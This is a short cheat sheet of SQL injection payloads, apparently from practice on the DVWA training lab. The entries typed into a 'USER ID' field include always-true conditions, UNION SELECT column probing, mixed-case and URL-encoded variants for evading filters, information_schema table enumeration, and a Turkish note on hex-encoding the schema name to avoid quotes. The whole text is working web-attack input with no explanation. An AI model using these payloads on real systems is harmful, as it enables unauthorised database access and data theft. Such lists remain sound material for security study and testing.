Advanced SQLi
USER ID: 1' AND 1=1#
USER ID: 1' OR 1=1#
USER ID: 1' OR 1=1;#
USER ID: 1' AND 40=40#
USER ID: 1'+AND+1=1#
USER ID: ' UnIoN+SelEcT+1,2,3,4,5#
USER ID: ' UnIoN+SelEcT+1,2,3,4,5--
USER ID: ' UnIoN+SelEcT+1,2,3,4,5//
USER ID: ' UnIoN+SelEcT+1,2,3,4,5%23
USER ID: '%20UnIoN%20SelEcT%201,2,3,4,5%23
USER ID: %27%20UnIoN%20SelEcT%201,2,3,4,5%23
USER ID: 1 AND 1=1#
USER ID: 1 union select 1,table_name from information_schema.tables
USER ID: 1 union select 1,table_name from information_schema.tables where table_schema='dvwa'#
	dvwa'in hex karşılığı = 0x64767761
USER ID: 1 union select 1,table_name from information_schema.tables where table_schema=0x64767761#
